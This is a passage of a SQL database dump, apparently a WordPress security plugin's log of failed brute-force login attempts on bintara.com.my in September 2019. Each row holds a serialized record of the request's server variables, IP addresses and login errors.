Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:40:\"https://bintara.com.my/test/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:18:\"/test/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYX6y2YqJrDl1gYLQWcUtQAAAAc\";s:12:\"REDIRECT_URL\";s:18:\"/test/wp-login.php\";s:11:\"REMOTE_ADDR\";s:11:\"142.4.1.222\";s:11:\"REMOTE_PORT\";s:5:\"50968\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:40:\"https://bintara.com.my/test/wp-login.php\";s:10:\"SCRIPT_URL\";s:18:\"/test/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYX6y2YqJrDl1gYLQWcUtQAAAAc\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569061579.5661\";s:12:\"REQUEST_TIME\";s:10:\"1569061579\";}}','notice','2019-09-21 10:26:21','2019-09-21 10:26:20',17799168,19289256,'https://bintara.com.my/test/wp-login.php',1,0,'142.4.1.222'),(25170,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:16:\"/wp/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"93\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:38:\"https://bintara.com.my/wp/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:16:\"/wp/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYX60FiJ7D9Gn7wDPh8SUQAAAMQ\";s:12:\"REDIRECT_URL\";s:16:\"/wp/wp-login.php\";s:11:\"REMOTE_ADDR\";s:14:\"82.165.155.140\";s:11:\"REMOTE_PORT\";s:5:\"56115\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:38:\"https://bintara.com.my/wp/wp-login.php\";s:10:\"SCRIPT_URL\";s:16:\"/wp/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYX60FiJ7D9Gn7wDPh8SUQAAAMQ\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569061585.1224\";s:12:\"REQUEST_TIME\";s:10:\"1569061585\";}}','notice','2019-09-21 10:26:26','2019-09-21 10:26:25',17795520,19285320,'https://bintara.com.my/wp/wp-login.php',1,0,'82.165.155.140'),(25171,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:43:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:16:\"/test/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:38:\"https://bintara.com.my/test/xmlrpc.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:16:\"/test/xmlrpc.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYX60rfBTP0kPOVnb8joFAAAAEc\";s:12:\"REDIRECT_URL\";s:16:\"/test/xmlrpc.php\";s:11:\"REMOTE_ADDR\";s:11:\"142.4.1.222\";s:11:\"REMOTE_PORT\";s:5:\"52326\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:38:\"https://bintara.com.my/test/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:16:\"/test/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYX60rfBTP0kPOVnb8joFAAAAEc\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569061586.2474\";s:12:\"REQUEST_TIME\";s:10:\"1569061586\";}}','notice','2019-09-21 10:26:28','2019-09-21 10:26:26',18313872,19610584,'https://bintara.com.my/test/xmlrpc.php',1,0,'142.4.1.222'),(25172,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:43:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:14:\"/wp/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:36:\"https://bintara.com.my/wp/xmlrpc.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:14:\"/wp/xmlrpc.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYX61DDrcQxTmGrCWuaG6gAAAcQ\";s:12:\"REDIRECT_URL\";s:14:\"/wp/xmlrpc.php\";s:11:\"REMOTE_ADDR\";s:14:\"82.165.155.140\";s:11:\"REMOTE_PORT\";s:5:\"56609\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:36:\"https://bintara.com.my/wp/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:14:\"/wp/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYX61DDrcQxTmGrCWuaG6gAAAcQ\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569061588.6222\";s:12:\"REQUEST_TIME\";s:10:\"1569061588\";}}','notice','2019-09-21 10:26:30','2019-09-21 10:26:29',18315232,19611584,'https://bintara.com.my/wp/xmlrpc.php',1,0,'82.165.155.140'),(25173,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:18:\"/test/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"93\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:40:\"https://bintara.com.my/test/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:18:\"/test/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYX687fBTP0kPOVnb8joFwAAAFg\";s:12:\"REDIRECT_URL\";s:18:\"/test/wp-login.php\";s:11:\"REMOTE_ADDR\";s:14:\"173.236.72.146\";s:11:\"REMOTE_PORT\";s:5:\"58267\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:40:\"https://bintara.com.my/test/wp-login.php\";s:10:\"SCRIPT_URL\";s:18:\"/test/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYX687fBTP0kPOVnb8joFwAAAFg\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569061619.9901\";s:12:\"REQUEST_TIME\";s:10:\"1569061619\";}}','notice','2019-09-21 10:27:01','2019-09-21 10:27:00',17797928,19288424,'https://bintara.com.my/test/wp-login.php',1,0,'173.236.72.146'),(24745,0,'notification_center','send_scheduled','a:2:{s:13:\"notifications\";a:1:{i:0;s:6:\"digest\";}s:6:\"silent\";b:0;}','debug','2019-09-17 21:14:23','2019-09-17 21:14:20',17705064,18168328,'https://bintara.com.my/wp-login.php',1,0,'185.100.67.78'),(24746,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"91\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"185.100.67.78\";s:11:\"REMOTE_PORT\";s:5:\"49226\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYFMtY75s89pqgR69SLWQAAAAY8\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568754870.0676\";s:12:\"REQUEST_TIME\";s:10:\"1568754870\";}}','notice','2019-09-17 21:14:31','2019-09-17 21:14:30',17739896,19230000,'https://bintara.com.my/wp-login.php',1,0,'185.100.67.78'),(24744,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"164.132.100.13\";s:11:\"REMOTE_PORT\";s:5:\"33930\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYFLBI75s89pqgR69SLViwAAAZQ\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:13:\"1568754436.12\";s:12:\"REQUEST_TIME\";s:10:\"1568754436\";}}','notice','2019-09-17 21:07:17','2019-09-17 21:07:16',18256416,19554392,'https://bintara.com.my/xmlrpc.php',1,0,'164.132.100.13'),(24743,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"90\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"164.132.100.13\";s:11:\"REMOTE_PORT\";s:5:\"33472\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYFLAY75s89pqgR69SLViQAAAYg\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:14:\"1568754433.362\";s:12:\"REQUEST_TIME\";s:10:\"1568754433\";}}','notice','2019-09-17 21:07:14','2019-09-17 21:07:13',17740392,19231296,'https://bintara.com.my/wp-login.php',1,0,'164.132.100.13'),(24742,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 